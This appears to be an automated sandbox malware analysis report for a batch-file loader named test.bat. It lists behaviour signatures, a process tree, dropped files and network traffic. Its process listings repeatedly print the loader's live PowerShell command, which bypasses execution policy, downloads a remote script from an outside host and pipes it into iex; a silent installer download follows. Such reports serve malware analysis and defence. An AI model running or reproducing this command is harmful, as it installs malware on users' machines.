File name:

test.bat

Full analysis: https://app.any.run/tasks/b2b92ac1-03a8-4ea4-9b02-fcf272605079
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 17, 2024, 07:42:42
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

0756CC7DC1C449185883C4E33E04AF1C

SHA1:

1DAC842179866F30DCE0271BE46A06CF589C45B6

SHA256:

B3190153A44C907327E0113435715AF1A86EDEBF63E42D1BA823B7A94DA624C2

SSDEEP:

3:ohAILCywSrbSJJLNytGQqPJH0cVERAIrFZ22dZiFoUBP6GLhsSIyOGREDzWfoNkJ:ohbGnytGQO0cb+22uFZMZziEWfozU5H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 6612)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 4292)
  • SUSPICIOUS

    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 6728)
      • cmd.exe (PID: 7124)
      • cmd.exe (PID: 6880)
      • powershell.exe (PID: 6612)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6728)
      • cmd.exe (PID: 7124)
      • cmd.exe (PID: 6880)
    • Application launched itself

      • cmd.exe (PID: 6728)
      • cmd.exe (PID: 7124)
      • cmd.exe (PID: 6880)
      • powershell.exe (PID: 6612)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6880)
      • powershell.exe (PID: 6612)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 6612)
    • The process executes Powershell scripts

      • powershell.exe (PID: 6612)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 4292)
    • Executable content was dropped or overwritten

      • tmpA8DE.exe (PID: 7148)
      • tmpA8DE.tmp (PID: 4144)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4292)
  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 7124)
      • notepad++.exe (PID: 2660)
      • cmd.exe (PID: 6880)
    • The executable file from the user directory is run by the Powershell process

      • tmpA8DE.exe (PID: 7148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
152
Monitored processes
18
Malicious processes
2
Suspicious processes
0

Behavior graph

Process nodes in the graph, in order from the start node: cmd.exe, conhost.exe, cmd.exe, rundll32.exe, cmd.exe, conhost.exe, cmd.exe, notepad++.exe, cmd.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe, powershell.exe, powershell.exe, powershell.exe, tmpa8de.exe, tmpa8de.tmp

Process information

PID
CMD
Path
Indicators
Parent process
PID:
864
CMD:
C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
PID:
1068
CMD:
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 | iex"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID:
2648
CMD:
C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
PID:
2660
CMD:
"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\AppData\Local\Temp\test.bat"
Path:
C:\Program Files\Notepad++\notepad++.exe
Parent process:
explorer.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.91
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\comctl32.dll
c:\windows\system32\msvcp_win.dll
PID:
3648
CMD:
C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
PID:
4144
CMD:
"C:\Users\admin\AppData\Local\Temp\is-NQKRN.tmp\tmpA8DE.tmp" /SL5="$12005E,21903858,832512,C:\Users\admin\AppData\Local\Temp\tmpA8DE.exe" /VERYSILENT /SUPPRESSMSGBOXES /subid= /AFFID=
Path:
C:\Users\admin\AppData\Local\Temp\is-NQKRN.tmp\tmpA8DE.tmp
Parent process:
tmpA8DE.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Setup/Uninstall
Exit code:
4
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-nqkrn.tmp\tmpa8de.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\msvcrt.dll
PID:
4292
CMD:
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 | iex"
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID:
6184
CMD:
C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1
Path:
C:\Windows\System32\cmd.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
PID:
6204
CMD:
C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Path:
C:\Windows\System32\rundll32.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
PID:
6320
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 438
Read events
18 438
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
15
Unknown types
0

Dropped files

PID: 2660 | Process: notepad++.exe | Type: xml
Filename: C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml
MD5: 312281C4126FA897EF21A7E8CCB8D495
SHA256: 53B4BE3ED1CFD712E53542B30CFE30C5DB35CC48BE7C57727DFEC26C9E882E90

PID: 2660 | Process: notepad++.exe | Type: xml
Filename: C:\Users\admin\AppData\Roaming\Notepad++\langs.xml
MD5: FE22EC5755BC98988F9656F73B2E6FB8
SHA256: F972C425CE176E960F6347F1CA2F64A8CE2B95A375C33A03E57538052BA0624D

PID: 6612 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
MD5: BC4681E567253E9E38CF14849D9F1C3E
SHA256: 85F35DCA3A71D02CE372438612D17760C2CC178D8AA0FA9F4B4C139B3DBC3AA9

PID: 6612 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gckn1bbt.uyk.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 2660 | Process: notepad++.exe | Type: xml
Filename: C:\Users\admin\AppData\Roaming\Notepad++\config.xml
MD5: A2ED875AA42589077C4D08F4F8912018
SHA256: 77B0174D655F327C1FC9520B4F8831ECD82E98351B26BB9C2EDD98FF0CD63A2D

PID: 6612 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pyoc5tqu.ifr.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 1068 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_banxcyv5.mqj.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 2660 | Process: notepad++.exe | Type: text
Filename: C:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.ini
MD5: F70F579156C93B097E656CABA577A5C9
SHA256: B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4

PID: 7148 | Process: tmpA8DE.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\is-NQKRN.tmp\tmpA8DE.tmp
MD5: D1E798672DC61A6CC978E21D4FB86286
SHA256: 37B266ABF92C47409319348DD6B584BBCE66753360077B59D26652773B0F091E

PID: 4292 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aotvzlir.0c5.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
73
DNS requests
24
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4376
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1588
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5168
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5168
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
4292
powershell.exe
GET
200
18.245.78.104:80
http://d18liq5eiez7ig.cloudfront.net/setup.exe
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4020
svchost.exe
239.255.255.250:1900
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
6944
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
816
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4360
SearchApp.exe
2.23.209.189:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4360
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4376
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4376
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.189
  • 2.23.209.187
  • 2.23.209.133
  • 2.23.209.132
  • 2.23.209.135
  • 2.23.209.186
  • 2.23.209.183
  • 2.23.209.130
  • 2.23.209.185
  • 92.123.104.46
  • 92.123.104.56
  • 92.123.104.57
  • 92.123.104.51
  • 92.123.104.58
  • 92.123.104.52
  • 92.123.104.45
  • 92.123.104.55
  • 92.123.104.47
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.31.67
  • 40.126.31.73
  • 20.190.159.68
  • 20.190.159.75
  • 20.190.159.4
  • 20.190.159.2
  • 20.190.159.64
  • 20.190.159.71
whitelisted
th.bing.com
  • 2.23.209.167
  • 2.23.209.180
  • 2.23.209.177
  • 2.23.209.173
  • 2.23.209.171
  • 2.23.209.175
  • 2.23.209.176
  • 2.23.209.166
  • 2.23.209.179
  • 92.123.104.63
  • 92.123.104.9
  • 92.123.104.6
  • 92.123.104.7
  • 92.123.104.67
  • 92.123.104.65
  • 92.123.104.66
  • 92.123.104.64
  • 92.123.104.62
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted

Threats

PID
Process
Class
Message
4292
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
4292
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4292
powershell.exe
Potentially Bad Traffic
ET POLICY Executable served from Amazon S3
4292
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: error while getting certificate informations